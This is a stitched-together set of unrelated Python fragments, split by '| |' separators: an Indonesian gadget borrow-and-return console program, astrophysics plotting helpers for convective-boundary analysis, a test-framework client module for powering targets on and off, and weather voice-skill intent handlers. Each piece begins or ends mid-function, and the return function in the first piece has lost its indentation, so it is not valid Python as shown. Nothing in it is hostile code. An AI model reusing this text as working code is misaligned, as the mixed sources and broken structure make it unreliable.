    check = None
    for i in range(len(personal_borrow)):
        if personal_borrow[i][2] == id_item:
            check = 'Checked'
    # Proceed if the gadget was fully returned before, or never borrowed.
    if syarat_terpenuhi_1 == True or check == None:
        # Validate the borrow date (expects DD/MM/YYYY).
        kondisi = True
        while(kondisi):
            # NOTE(review): the name ``format`` shadows the builtin of the
            # same name within this function.
            format = "%d/%m/%Y"
            date_string = input("Tanggal peminjaman: ")
            cond = False
            if len(date_string) == 10:
                cond = True
            # Re-prompt until the input is exactly 10 characters long.
            if cond == False:
                while(True):
                    print("Masukan tanggal dengan benar, yakni 2 digit tanggal, 2 digit bulan, dan 4 digit tahun dan format DD/MM/YYYY")
                    date_string = input("Tanggal peminjaman: ")
                    if len(date_string) == 10:
                        cond = True
                        break
            # Accept the date only if it parses; otherwise ask again.
            try:
                datetime.datetime.strptime(date_string, format)
                break
            except ValueError:
                print("Tanggal yang anda masukan salah. Silahkan masukan kembali tanggal dengan format DD/MM/YYYY")
        # Validate the amount: must be a positive integer within stock.
        current_amount = gadget[indeks][3]
        terms = True
        while(terms):
            try:
                amount = int(input("Jumlah peminjaman: "))
                if (amount <= current_amount) and (amount > 0):
                    gadget[indeks][3] = current_amount - amount
                    print(f"Item {gadget[indeks][1]} (x{amount}) berhasil dipinjam!")
                    print()
                    terms = False
                else:
                    print(f"Jumlah yang anda ingin pinjam melebihi yang ada dalam stok penyimpanan atau anda memasukan angka di bawah 1. Silahkan masukan kembali jumlah yang ingin dipinjam dengan maksimal meminjam {current_amount}")
            except ValueError:
                print("Silahkan masukan kembali jumlah dengan angka yang benar")
        # Record the borrow in gadget_borrow_history (False = not yet returned).
        id_peminjaman = 'GBH' + str(len(gadget_borrow_history))
        gadget_borrow_history.append([id_peminjaman, idUser, id_item, date_string, amount, False])
    # The user borrowed this gadget before and has not returned it yet.
    else:
        print("Maaf, anda pernah meminjam gadget yang sama dan belum mengembalikannya, anda harus mengembalikan secara keseluruhan gadget yang baru saja anda ingin pinjam")
        print()
# Referensi
# https://www.kite.com/python/answers/how-to-validate-a-date-string-format-in-python
# ============================ F9 + FB02 ========================================
def kembalikan():
# Mengembalikan gadget yang pernah dipinjam baik sebagian maupun keseluruhan
# I.S. matriks data gadget, gadget_borrow_history, dan gadget_return_history terdefinisi
# F.S. jumlah gadget pada data gadget berkurang dan terdapat entri baru pada gadget_borrow_history
# KAMUS LOKAL
# id_returned_gadget, id_pengembalian, tanggal : string
# syaratnya : boolean
# option, indeksnya, markernya, max_returned, total_amount_returned, total_amount_returned_updated, amount_returned, z, n, an : integer
# personal_borrow_not_return, updated_unique_personal_borrow_not_returned : array of string
# unique_personal_borrow_not_returned : set of string
# ALGORITMA
# Menampilkan ke user gadget yang pernah ia pinjam
personal_borrow_not_returned = []
for a in range(len(gadget_borrow_history)):
if gadget_borrow_history[a][1] == idUser and gadget_borrow_history[a][5] == False:
personal_borrow_not_returned.append(gadget_borrow_history[a][2])
unique_personal_borrow_not_returned = set(personal_borrow_not_returned)
updated_unique_personal_borrow_not_returned = list(unique_personal_borrow_not_returned)
# Kondisi jika user pernah meminjam barang sebelumnya
if len(updated_unique_personal_borrow_not_returned) > 0:
# Menampilkan setiap gadget yang pernah dipinjam oleh user
for i in range(len(updated_unique_personal_borrow_not_returned)):
for j in range(len(gadget)):
syaratnya = False
if updated_unique_personal_borrow_not_returned[i] == gadget[j][0]:
print(f"{i + 1}. {gadget[j][1]}")
syaratnya = True
break
if not syaratnya: # jika gadget ada yang dihapus dan sedang dipinjam
print(str(i+1) + ". " + updated_unique_personal_borrow_not_returned[i] + " (entry telah dihapus dari database gadget, tidak bisa dikembalikan)")
updated_unique_personal_borrow_not_returned[i] = "False"
# Meminta user memilih opsi item sesuai nomor
banyak = len(updated_unique_personal_borrow_not_returned)
syaratnya = True
while(syaratnya):
try:
option = int(input("Masukan nomor peminjaman: "))
if option > 0 and option <= banyak:
syaratnya = False
if updated_unique_personal_borrow_not_returned[option - 1] == "False":
print("Tidak dapat mengembalikan gadget yang telah dihapus")
return # jika gadget ada yang dihapus dan sedang dipinjam, Asumsi tidak dapat dikembalikan
except ValueError:
print("Silahkan masukan kembali nomor dengan benar")
# Meminta user memasukan tanggal dan memvalidasinya
kondisi = True
while(kondisi):
format = "%d/%m/%Y"
date_string = input("Tanggal pengembalian: ")
cond = False
if len(date_string) == 10:
cond = True
if cond == False:
while(True):
print("Masukan tanggal dengan benar, yakni 2 digit tanggal, 2 digit bulan, dan 4 digit tahun dan format DD/MM/YYYY")
date_string = input("Tanggal pengembalian: ")
if len(date_string) == 10:
cond = True
break
try:
datetime.datetime.strptime(date_string, format)
break
except ValueError:
print("Tanggal yang anda | |
pl.gca().xaxis.set_visible(False)
pl.ylabel('colour index')
if horizontal:
cbar = pl.colorbar(orientation='horizontal', ticks = colour_index_ticks)
cbar.ax.set_xticklabels(ticks*scale_factor)
else:
cbar = pl.colorbar(ticks = colour_index_ticks)
cbar.ax.set_yticklabels(ticks*scale_factor)
cbar.solids.set_edgecolor('face')
cbar.ax.tick_params(axis='both', which='both',length=0,labelsize=6)
pl.draw()
return cbar
def cmap_from_str(str, segment=None):
    """Create a LinearSegmentedColormap from a colour-map definition string.

    Every line of the form ``Cnot: value r g b`` (exactly five
    whitespace-separated fields) contributes one control point; all other
    lines are ignored.

    Parameters
    ----------
    str : string
        Colour-map definition text. (The parameter shadows the builtin
        ``str``; the name is kept for backwards compatibility with
        existing keyword callers.)
    segment : 2-tuple of float, optional
        If given, restrict the colour map to control-point values in
        ``[segment[0], segment[1]]``; the end points are obtained by
        linear interpolation between the neighbouring control points.

    Returns
    -------
    cmap : matplotlib.colors.LinearSegmentedColormap
    """
    points = []
    for line in str.splitlines():
        parts = line.split()
        if (len(parts) == 5) and (parts[0] == 'Cnot:'):
            points.append(parts[1:])

    # np.float was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin float is the documented replacement.
    points = np.array(points, dtype=float)

    # Sort the control points by value.
    points = points[points[:, 0].argsort()]

    if segment is not None:
        # Index of the first point with value > segment[0]; interpolate a
        # new first control point exactly at segment[0].
        idx0 = np.argmax(points[:, 0] > segment[0])
        if idx0 > 0:
            t = (float(segment[0]) - points[idx0 - 1, 0])/ \
                (points[idx0, 0] - points[idx0 - 1, 0])
            new_point = (1. - t)*points[idx0 - 1, :] + t*points[idx0, :]
            points = np.vstack([new_point, points[idx0:, :]])

        # Index of the first point with value > segment[1]; interpolate a
        # new last control point exactly at segment[1].
        idx1 = np.argmax(points[:, 0] > segment[1])
        if idx1 > 0:
            t = (float(segment[1]) - points[idx1 - 1, 0])/ \
                (points[idx1, 0] - points[idx1 - 1, 0])
            if t > 0.:
                new_point = (1. - t)*points[idx1 - 1, :] + t*points[idx1, :]
                points = np.vstack([points[0:idx1, :], new_point])
            else:
                points = points[0:idx1, :]

    # Normalise the control-point values to [0, 1] as expected by
    # LinearSegmentedColormap.
    p0 = points[0, 0]
    p1 = points[-1, 0]
    points[:, 0] = (points[:, 0] - p0)/(p1 - p0)

    def _channel(col):
        # Each channel needs rows of (x, y_below, y_above); we use
        # y_below == y_above, i.e. no discontinuities.
        ch = np.zeros((points.shape[0], 3))
        ch[:, 0] = points[:, 0]
        ch[:, 1] = points[:, col]
        ch[:, 2] = points[:, col]
        return ch

    cmap_points = {'red': _channel(1), 'green': _channel(2),
                   'blue': _channel(3)}
    cmap = LinearSegmentedColormap('my_cmap', cmap_points)
    return cmap
###########################################################
# Additional plotting methods Jericho
###########################################################
def analyse_dump(rp, r1, r2):
    '''
    Analyse the ray profiles of one dump.

    Parameters
    ----------
    rp : radial profile
        radial profile object of the dump to analyse
    r1 : float
        lower edge of the radius range searched for r_ub
    r2 : float
        upper edge of the radius range searched for r_ub

    Returns
    -------
    r : array
        radius grid
    ut : array
        RMS tangential velocity profiles for all buckets (except the 0th)
    dutdr : array
        radial gradient of ut for all buckets (except the 0th)
    r_ub : array
        radius of the upper boundary, defined by the minimum of dutdr,
        for all buckets (except the 0th)
    '''
    n_buckets = rp.get('nbuckets')
    r = rp.get_table('y')
    # Central difference of the radius grid.
    dr = 0.5*(np.roll(r, -1) - np.roll(r, +1))

    # Grid indices bracketing the search window [r1, r2].
    idx1 = np.argmin(np.abs(r - r1))
    idx2 = np.argmin(np.abs(r - r2))

    ekt = rp.get_table('ekt')
    ut = ekt[0, :, 1:n_buckets + 1]**0.5

    # Central difference of ut along radius, divided bucket by bucket by
    # dr to form the radial gradient.
    dut = 0.5*(np.roll(ut, -1, axis=0) - np.roll(ut, +1, axis=0))
    dutdr = np.transpose(np.array([dut[:, b]/dr for b in range(n_buckets)]))

    # Location of the steepest decline within the search window.
    idx_min_dutdr = [idx1 + np.argmin(dutdr[idx1:idx2 + 1, b])
                     for b in range(n_buckets)]

    r_ub = np.zeros(n_buckets)
    for b, idx in enumerate(idx_min_dutdr):
        r_min = r[idx]  # 0th-order estimate
        # Refine by fitting a parabola through the three points around
        # the grid minimum.
        r_fit = r[idx - 1:idx + 2]
        dutdr_fit = dutdr[idx - 1:idx + 2, b]
        coefs = np.polyfit(r_fit, dutdr_fit, 2)
        if coefs[0] != 0:
            # Vertex of the fitted parabola.
            r_min = -coefs[1]/(2.*coefs[0])
        # Fall back to the grid point if the fit went awry.
        if r_min < r[idx - 1] or r_min > r[idx + 1]:
            r_min = r[idx]
        r_ub[b] = r_min
    return r, ut, dutdr, r_ub
def upper_bound_ut(data_path, dump_to_plot, hist_dump_min,
                   hist_dump_max, r1, r2, ylims = None, derivative = False, silent = True):
    '''
    Finds the upper convective boundary as defined by the steepest decline in
    tangential velocity.

    Subplot(1) plots the tangential velocity as a function of radius for a
    single dump and displays the convective boundary.
    Subplot(2) plots a histogram of the convective boundaries for a range of
    dumps specified by the user and compares them to the selected dump.

    Plots Fig. 14 or 15 in paper: "Idealized hydrodynamic simulations
    of turbulent oxygen-burning shell convection in 4 pi geometry"
    NASA ADS: http://adsabs.harvard.edu/abs/2017MNRAS.465.2991J

    Parameters
    ----------
    data_path : str
        path to the rprofile data set
    dump_to_plot : int
        The file number of the dump you wish to plot
    hist_dump_min/hist_dump_max : int
        Range of file numbers you want to use in the histogram
    r1/r2 : float
        This function will only search for the convective
        boundary in the range between r1/r2
    ylims : list, optional
        y-axis limits for the top panel
    derivative : bool
        True = plot dut/dr, False = plot ut
    silent : bool
        suppress informational printout

    Examples
    --------
    .. ipython::

        In [136]: data_path = '/data/ppm_rpod2/RProfiles/AGBTP_M2.0Z1.e-5/F4/'
           .....: dump = 560; hist_dmin = dump - 1; hist_dmax = dump + 1
           .....: r_lim = (27.0, 30.5)

        @savefig upper_bound.png width=6in
        In [136]: ppm.upper_bound_ut(data_path,dump, hist_dmin, hist_dmax,r1 = r_lim[0],r2 = 31, derivative = False,ylims = [1e-3,19.])
    '''
    cb = utils.colourblind
    rp_set = bprof.rprofile_set(data_path)
    rp = rp_set.get_dump(dump_to_plot)
    nr = len(rp.get('y'))

    sparse = 1
    dumps = np.array([rp_set.dumps[i] for i in range(0, len(rp_set.dumps), sparse)])
    n_dumps = len(dumps)
    n_buckets = rp_set.get_dump(dumps[0]).get('nbuckets')

    t = np.zeros(n_dumps)
    r_ub = np.zeros((n_buckets, n_dumps))
    ut = np.zeros((nr, n_buckets, n_dumps))
    dutdr = np.zeros((nr, n_buckets, n_dumps))
    for k in range(n_dumps):
        rp = rp_set.get_dump(dumps[k])
        t[k] = rp.get('time')
        r, ut[:, :, k], dutdr[:, :, k], r_ub[:, k] = analyse_dump(rp, r1, r2)

    avg_r_ub = np.sum(r_ub, axis = 0)/float(n_buckets)
    dev = np.array([r_ub[i, :] - avg_r_ub for i in range(n_buckets)])

    # One-sided RMS fluctuations of the boundary radius around the bucket
    # average (positive and negative deviations treated separately).
    sigmap_r_ub = np.zeros(n_dumps)
    sigmam_r_ub = np.zeros(n_dumps)
    for k in range(n_dumps):
        devp = dev[:, k]
        devp = devp[devp >= 0]
        if len(devp) > 0:
            sigmap_r_ub[k] = (sum(devp**2)/float(len(devp)))**0.5
        else:
            # BUG FIX: the original wrote to sigmam_r_ub in this branch,
            # leaving sigmap_r_ub at 0 and clobbering sigmam_r_ub.
            sigmap_r_ub[k] = np.nan

        devm = dev[:, k]
        devm = devm[devm <= 0]
        if len(devm) > 0:
            sigmam_r_ub[k] = (sum(devm**2)/float(len(devm)))**0.5
        else:
            sigmam_r_ub[k] = np.nan

    # Map dump *numbers* to indices into the per-dump arrays; the two only
    # coincide when the dump sequence is 0, 1, 2, ...  The original code
    # indexed the arrays with the dump numbers directly, which is wrong
    # for any other dump sequence.
    idx = np.argmin(np.abs(dumps - dump_to_plot))
    hidx_min = np.argmin(np.abs(dumps - hist_dump_min))
    hidx_max = np.argmin(np.abs(dumps - hist_dump_max))

    # Histogram bin edges halfway between radial grid points.
    hist_bins = 0.5*(r + np.roll(r, -1))
    hist_bins[-1] = hist_bins[-2] + (hist_bins[-2] - hist_bins[-3])
    #hist_bins = np.insert(hist_bins, 0., 0.) # #robert - this command throws an error?!?
    if not silent:
        print("Dump {:d} (t = {:.2f} min).".format(dump_to_plot, t[idx]/60.))
        print("Histogram constructed using dumps {:d} (t = {:.2f} min) to {:d} (t = {:.2f} min) inclusive."\
              .format(hist_dump_min, t[hidx_min]/60., hist_dump_max, t[hidx_max]/60.))

    fig = pl.figure( figsize = (2*3.39, 2*2.8))
    #fig = pl.figure( figsize = (2*5, 2*4))
    gs = gridspec.GridSpec(2, 1, height_ratios = [3, 1])
    ax0 = pl.subplot(gs[0])

    if derivative:
        temp = dutdr
        lims = (-0.49, 0.1)
    else:
        temp = 1e3*ut
        lims = (-9.99, 70)
    ax0.set_ylim(lims)

    for bucket in range(n_buckets):
        lbl = r'bucket data' if bucket == 0 else None
        ax0.plot(r, temp[:, bucket, idx], ls = '-', lw = 0.5, color = cb(3), \
                 label = lbl)

        # Short vertical tick marking the steepest decline of this bucket.
        lines = (min(lims) + (max(lims)- min(lims))/13.3 ,\
                 min(lims) + (max(lims)- min(lims))/13.3 + (max(lims)- min(lims))/30)
        lbl = r'steepest decline'
        lbl = lbl if bucket == 0 else None
        ax0.plot((r_ub[bucket, idx], r_ub[bucket, idx]), lines, \
                 ls = '-', lw = 0.5, color = cb(4), label = lbl)

    ax0.axvline(x = avg_r_ub[idx], ls = '--', lw = 1., color = cb(4), label = 'average')
    ax0.axvline(x = avg_r_ub[idx] - 2*sigmam_r_ub[idx], ls = ':', lw = 1., \
                color = cb(4), label = r'2$\sigma$ fluctuations')
    ax0.axvline(x = avg_r_ub[idx] + 2*sigmap_r_ub[idx], ls = ':', lw = 1., color = cb(4))
    ax0.set_xlim((r1 - 0.4, r2))
    if ylims is not None:
        ax0.set_ylim(ylims)
    ax0.set_ylabel(r'v$_{\!\perp}$ / km s$^{-1}$')
    yticks = ax0.yaxis.get_major_ticks()
    yticks[0].label1.set_visible(False)
    ax0.legend(loc = 3, frameon = False)
    #ax0.autoscale(enable=True, axis='y', tight=True)

    ax1 = pl.subplot(gs[1])
    ax1.hist(r_ub[:, hidx_min:hidx_max + 1].flatten(), bins = hist_bins, \
             log = True, color = cb(3), edgecolor = cb(4), lw = 0.5)
    ax1.axvline(x = avg_r_ub[idx], ls = '--', lw = 1., color = cb(4))
    ax1.axvline(x = avg_r_ub[idx] - 2*sigmam_r_ub[idx], ls = ':', lw = 1., color = cb(4))
    ax1.axvline(x = avg_r_ub[idx] + 2*sigmap_r_ub[idx], ls = ':', lw = 1., color = cb(4))
    ax1.set_xlim((r1 - 0.4, r2))
    #ax1.set_ylim((4e-1, 4e3))
    ax1.set_xlabel(r'r / Mm')
    ax1.set_ylabel(r'N')
    ax1.minorticks_off()
    fig.subplots_adjust(hspace = 0)
    pl.setp([a.get_xticklabels() for a in fig.axes[:-1]], visible = False)
def get_avg_rms_velocities(prof, dumps, comp):
'''
Finds an average velocity vector as a function of radius for a given
range of dumps. To find a velocity vector as a function of radius see
get_v_evolution().
Parameters
----------
yprof : yprofile instance
profile to examine
dumps : range
dumps to average over
comp : string
component to use 'r':'radial','t':'tangential','tot':'total'
'''
avg_rms_v = 0.
for d in dumps:
if comp == 'tot':
rms_v = np.sqrt(2.*prof.get('Ek', | |
<reponame>jhaapako/tcf
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
"""
Power on or off the target or any its power rail components
-----------------------------------------------------------
This module implements the client side API for controlling the power's
target as well as the hooks to access these interfaces from the
command line.
"""
import collections
import collections.abc
import json
import re

import commonl

from . import tc
from . import msgid_c
class extension(tc.target_extension_c):
    """
    Extension to :py:class:`tcfl.tc.target_c` to interact with the
    server's power control interface.

    Use as:

    >>> target.power.on()
    >>> target.power.off()
    >>> target.power.cycle()
    >>> target.power.get()
    >>> target.power.list()
    """
    def __init__(self, target):
        # Only attach the extension to targets that expose a power
        # interface; tc.target_extension_c discards it otherwise.
        if 'power' in target.rt.get('interfaces', []):
            return
        raise self.unneeded

    def get(self):
        """
        Return a target's power status, *True* if powered, *False*
        otherwise.

        A target is considered *on* when all of its power rail
        components are on; fake power components report power state as
        *None* and those are not taken into account.

        A more detailed picture of the target's power state can be
        obtained with :meth:list.
        """
        state, _, _ = self.list()
        return state

    def list(self):
        # FIXME: add component to make it faster when we only need one component
        """
        Return a list of a target's power rail components and their status

        :returns tuple(state, substate, data):

        - state: *True* on, *False* off, *None* not available
        - substate: "normal", "full", "inconsistent"; if
          inconsistent, it would be a good idea to power cycle
        - data: dictionary keyed by component name listing their state
          and other flags about them:

          .. code-block:: python

             {
                 "NAME1": {
                     "state": STATE1,
                     ["explicit": "on|off|both" ]
                 },
                 "NAME2": {
                     "state": STATE2,
                     ["explicit": "on|off|both" ]
                 },
                 ...
             }

          - *state*: *True* if powered, *False* if not, *None* if not
            applicable, for fake power controls
          - *explicit*: (see :ref:`ttbd_power_explicit`) if missing,
            not explicit, will be turned on/off normally:

            - *on*: only powered on if explicitly named
            - *off*: only powered off if explicitly named
            - *both*: only powered on/off if explicitly named
        """
        self.target.report_info("listing", dlevel = 2)
        r = self.target.ttbd_iface_call(
            "power", "list", method = "GET",
            # extra time, since power ops can take long
            timeout = 60)
        if 'power' in r:
            data = collections.OrderedDict()
            # backwards compat
            #
            ## [
            ##   [ NAME1, STATE2 ],
            ##   [ NAME2, STATE2 ],
            ##   ...
            ## ]
            #
            for i in r.get('power', []):
                data[i[0]] = dict(state = i[1])
            substate = 'normal'  # older doesn't support substates
            state = all(i['state'] in (True, None) for i in list(data.values()))
        # BUG FIX: collections.Mapping was an alias removed in Python
        # 3.10; the ABC lives in collections.abc.
        elif isinstance(r, collections.abc.Mapping):
            # proper response format
            #
            ## {
            ##   NAME1: { state: STATE1, [explicit: "on|off|both" ] },
            ##   NAME2: { state: STATE2, [explicit: "on|off|both" ] },
            ##   ...
            ## }
            #
            # FIXME: verify the format
            state = r['state']
            substate = r['substate']
            data = r['components']
        else:
            raise AssertionError("can't parse response")
        self.target.report_info("listed", dlevel = 2)
        return state, substate, data

    @staticmethod
    def _estimated_duration_get(data, operation):
        # Per-operation estimate wins over the generic one; default 0.
        return data.get(
            'estimated_duration_%s' % operation,
            data.get('estimated_duration', 0))

    @staticmethod
    def _compute_duration(target, component, operation):
        # Sum the components' declared duration estimates to size the
        # request timeout.
        timeout = 0
        if component:
            data = target.rt.get('interfaces', {})\
                            .get('power', {})\
                            .get(component, None)
            if data:
                timeout += extension._estimated_duration_get(data, operation)
        else:
            # collect all the timeouts from the different components
            # to get an estimate on what to wait
            for name, data in target.rt.get('interfaces', {})\
                                       .get('power', {})\
                                       .items():
                if isinstance(data, dict):
                    # components are dictionaries, the rest are not components
                    timeout += extension._estimated_duration_get(data, operation)
        return timeout

    def off(self, component = None, explicit = False):
        """
        Power off a target or parts of its power rail

        :param str component: (optional) name of component to
          power off, defaults to whole target's power rail
        :param bool explicit: (optional) also operate on components
          marked explicit (defaults to *False*)
        """
        if component is not None:
            assert isinstance(component, str)
            component_s = f" component {component}"
        else:
            component_s = ""
        assert isinstance(explicit, bool)
        target = self.target
        target.report_info("powering off" + component_s, dlevel = 1)
        # 60s base plus whatever the components declare they need.
        timeout = 60 + self._compute_duration(target, component, "off")
        if timeout > 120:
            target.report_info(
                "WARNING: long power-off--estimated duration %s seconds"
                % timeout)
        target.ttbd_iface_call(
            "power", "off", component = component, explicit = explicit,
            timeout = timeout)
        target.report_info("powered off" + component_s)

    def on(self, component = None, explicit = False):
        """
        Power on a target or parts of its power rail

        :param str component: (optional) name of component to
          power on, defaults to whole target's power rail
        :param bool explicit: (optional) also operate on components
          marked explicit (defaults to *False*)
        """
        if component is not None:
            assert isinstance(component, str)
            component_s = f" component {component}"
        else:
            component_s = ""
        assert isinstance(explicit, bool)
        target = self.target
        target.report_info("powering on" + component_s, dlevel = 1)
        timeout = 60 + self._compute_duration(target, component, "on")
        if timeout > 120:
            target.report_info(
                "WARNING: long power-on--estimated duration %s seconds"
                % timeout)
        target.ttbd_iface_call(
            "power", "on", component = component, explicit = explicit,
            # extra time, since power ops can take long
            timeout = timeout)
        target.report_info("powered on" + component_s)
        # A power-on can reset the console; restore the default one.
        if hasattr(target, "console"):
            target.console._set_default()

    def cycle(self, component = None, wait = None, explicit = False):
        """
        Power cycle a target or one of its components

        :param float wait: (optional) seconds to wait before powering on
        :param str component: (optional) name of component to
          power-cycle, defaults to whole target's power rail
        :param bool explicit: (optional) also operate on components
          marked explicit (defaults to *False*)
        """
        assert wait is None or wait >= 0
        if component is not None:
            assert isinstance(component, str)
            component_s = f" component {component}"
        else:
            component_s = ""
        assert isinstance(explicit, bool)
        target = self.target
        target.report_info("power cycling" + component_s, dlevel = 1)
        # Budget both the off and the on legs of the cycle.
        timeout = 60 \
            + self._compute_duration(target, component, "on") \
            + self._compute_duration(target, component, "off")
        if timeout > 120:
            target.report_info(
                "WARNING: long power-cycle--estimated duration %s seconds"
                % timeout)
        target.ttbd_iface_call(
            "power", "cycle",
            component = component, wait = wait, explicit = explicit,
            timeout = timeout)
        target.report_info("power cycled" + component_s)
        if hasattr(target, "console"):
            target.console._set_default()

    def reset(self):
        """
        Reset a target

        This interface is **deprecated**.
        """
        self.target.report_info("resetting", dlevel = 1)
        self.target.report_info("DEPRECATED: reset()", level = 0)
        # reset is deprecated at the server level
        self.target.ttbd_iface_call(
            "power", "cycle",
            # extra time, since power ops can take long
            timeout = 60)
        self.target.report_info("reset")
        if hasattr(self.target, "console"):
            self.target.console._set_default()

    def sequence(self, sequence, timeout = None):
        """
        Execute a sequence of power actions on a target

        :param str sequence: a list of pairs:

        >>> ( OPERATION, ARGUMENT )

        *OPERATION* is a string that can be:

        - *on*, *off* or *cycle*; *ARGUMENT* is a string being:

          - *all*: do the operation on all the components except
            :ref:`explicit <ttbd_power_explicit>` ones
          - *full*: perform the operation on all the components
            including the :ref:`explicit <ttbd_power_explicit>` ones
          - *COMPONENT NAME*: perform the operation only on the given
            component

        - *wait*: *ARGUMENT* is a number describing how many seconds
          to wait

        For example:

        >>> [ ( 'off', 'full' ), ( 'wait', 2 ), ( 'on', 'all' ) ]

        powers off every single component of the power rail, waits
        two seconds and then powers on all the components needed for
        normal system's power on.

        :param float timeout: (optional) maximum seconds to wait
          before giving up; default is whatever calculated based on
          how many *wait* operations are given or if none, whatever
          the default is set in
          :meth:`tcfl.tc.target_c.ttbd_iface_call`.
        """
        kwargs = {}
        if timeout is not None:
            kwargs['timeout'] = timeout
        # FIXME: compute length for timeout
        self.target.report_info("running sequence: %s" % (sequence, ), dlevel = 1)
        self.target.ttbd_iface_call("power", "sequence", method = "PUT",
                                    sequence = sequence, **kwargs)
        self.target.report_info("ran sequence: %s" % (sequence, ))

    def _healthcheck(self):
        # Exercise the power interface end to end:
        # off -> verify, on -> verify, cycle, list, off -> verify.
        target = self.target

        target.power.off()
        power = target.power.get()
        if power is not False:
            raise tc.failed_e("power should be False, reported %s" % power)
        target.report_pass("power is reported correctly as %s" % power)

        target.power.on()
        power = target.power.get()
        state, substate, components = target.power.list()
        if power is not True:
            raise tc.failed_e("power should be True, reported %s" % power,
                              dict(state = state, substate = substate,
                                   components = components, power = power))
        target.report_pass("power is reported correctly as %s" % power)

        target.power.cycle()
        components = target.power.list()
        target.report_pass("power components listed",
                           dict(components = components))

        target.power.off()
        power = target.power.get()
        if power is not False:
            raise tc.failed_e("power should be False, reported %s" % power)
        target.report_pass("power is reported correctly as %s" % power)
def _cmdline_power_off(args):
    """Command-line front end: power off every target named in *args*."""
    # Minimal global test-case scaffolding the target API expects.
    tc.tc_global = tc.tc_c("cmdline", "", "builtin")
    # FIXME: hack console driver
    console_driver = tc.report_console.driver(0, None)
    tc.report_driver_c.add(console_driver)
    with msgid_c("cmdline"):
        for name in args.targets:
            target = tc.target_c.create_from_cmdline_args(
                args, name, iface = "power",
                extensions_only = [ 'power' ])
            target.power.off(args.component, explicit = args.explicit)
def _cmdline_power_on(args):
tc.tc_global = tc.tc_c("cmdline", | |
handle_three_day_forecast(self, message):
try:
report = self.__initialize_report(message)
self.report_threeday_forecast(report)
except HTTPError as e:
self.__api_error(e)
except Exception as e:
LOG.exception("Error: {0}".format(e))
# Handle: What is the weather forecast?
@intent_handler(IntentBuilder("").require(
    "Forecast").optionally("Location").build())
def handle_forecast(self, message):
    """Speak the forecast for the date mentioned in the utterance."""
    try:
        report = self.__initialize_report(message)
        # Get a date from spoken request; element [0] of the
        # extract_datetime() result is the parsed datetime.
        when = extract_datetime(message.data.get('utterance'),
                                lang=self.lang)[0]
        self.report_forecast(report, when)
    except HTTPError as e:
        # Weather-API failures go to the dedicated error handler.
        self.__api_error(e)
    except Exception as e:
        LOG.exception("Error: {0}".format(e))
def __get_requested_unit(self, message):
    """ Get selected unit from message.

    Arguments:
        message (Message): messagebus message from intent service
    Returns:
        'fahrenheit' if the utterance asked for it, otherwise 'celsius'
    """
    # Guard-clause form: without a 'Unit' entity we default to celsius.
    if 'Unit' not in message.data:
        return 'celsius'
    if self.voc_match(message.data['Unit'], 'Fahrenheit'):
        return 'fahrenheit'
    return 'celsius'
@intent_handler(IntentBuilder("").require("Query").require(
    "Temperature").optionally("Location").optionally("Unit").build())
def handle_current_temperature(self, message):
    # Thin delegate: shared typed handler with the 'temperature'
    # response type.
    return self.__handle_typed(message, 'temperature')
@intent_handler(IntentBuilder("").require("Query").require("High") \
    .optionally("Temperature").optionally("Location") \
    .optionally("Unit").build())
def handle_high_temperature(self, message):
    # Thin delegate: shared typed handler with the 'high.temperature'
    # response type.
    return self.__handle_typed(message, 'high.temperature')
@intent_handler(IntentBuilder("").require("Query").require("Low") \
    .optionally("Temperature").optionally("Location") \
    .optionally("Unit").build())
def handle_low_temperature(self, message):
    # Thin delegate: shared typed handler with the 'low.temperature'
    # response type.
    return self.__handle_typed(message, 'low.temperature')
@intent_handler(IntentBuilder("").require("ConfirmQuery").require(
    "Windy").optionally("Location").build())
def handle_isit_windy(self, message):
    """ Handler for utterances similar to "is it windy today?" """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None when the lookup failed
    # (it logs the error itself); bail out instead of crashing on the
    # subscripts below.
    if report is None:
        return
    if self.__get_speed_unit() == 'mph':
        limits = WINDSTRENGTH_MPH
        report['wind_unit'] = self.translate('miles per hour')
    else:
        limits = WINDSTRENGTH_MPS
        report['wind_unit'] = self.translate('meters per second')
    dialog = []
    if 'day' in report:
        dialog.append('forecast')
    if "Location" not in message.data:
        dialog.append('local')
    # Classify wind strength against the unit-appropriate thresholds.
    # NOTE(review): report['wind'] is "{speed} {unit}" formatted in
    # __populate_report(); int() on it only works while the unit part is
    # empty -- confirm.
    if int(report['wind']) >= limits['hard']:
        dialog.append('hard')
    elif int(report['wind']) >= limits['medium']:
        dialog.append('medium')
    else:
        dialog.append('light')
    dialog.append('wind')
    dialog = '.'.join(dialog)
    report['wind'] = pronounce_number(int(report['wind']), self.lang)
    self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
    "Hot", "Cold").optionally("Location").build())
def handle_isit_hot(self, message):
    """ Handler for utterances similar to
        is it hot today?, is it cold? will it be hot tomorrow?, etc
    """
    # Both Hot and Cold vocab map to the single 'hot' response type.
    return self.__handle_typed(message, 'hot')
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
    "Snowing").optionally("Location").build())
def handle_isit_snowing(self, message):
    """ Handler for utterances similar to "is it snowing today?"
    """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None on failure; guard
    # before subscripting it.
    if report is None:
        return
    if self.voc_match(report['condition'], 'Snowing'):
        dialog = 'affirmative.condition'
    elif self.voc_match(report['condition'], 'SnowAlternatives'):
        dialog = 'snowing.alternative'
    else:
        dialog = 'no.snow.predicted'
    # Prefix selection: local vs named location, current vs forecast.
    if "Location" not in message.data:
        dialog = 'local.' + dialog
    if report.get('day'):
        dialog = 'forecast.' + dialog
    self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
    "Clear").optionally("Location").build())
def handle_isit_clear(self, message):
    """ Handler for utterances similar to "is it clear skies today?"
    """
    report = self.__populate_report(message)
    # BUG FIX: __populate_report() returns None on failure; guard
    # before subscripting it.
    if report is None:
        return
    if self.voc_match(report['condition'], 'Clear'):
        dialog = 'affirmative.condition'
    elif self.voc_match(report['condition'], 'ClearAlternatives'):
        dialog = 'clear.alternative'
    else:
        dialog = 'no.clear.predicted'
    # Prefix selection: local vs named location, current vs forecast.
    if "Location" not in message.data:
        dialog = 'local.' + dialog
    if report.get('day'):
        dialog = 'forecast.' + dialog
    self.speak_dialog(dialog, report)
@intent_handler(IntentBuilder("").require("ConfirmQuery").one_of(
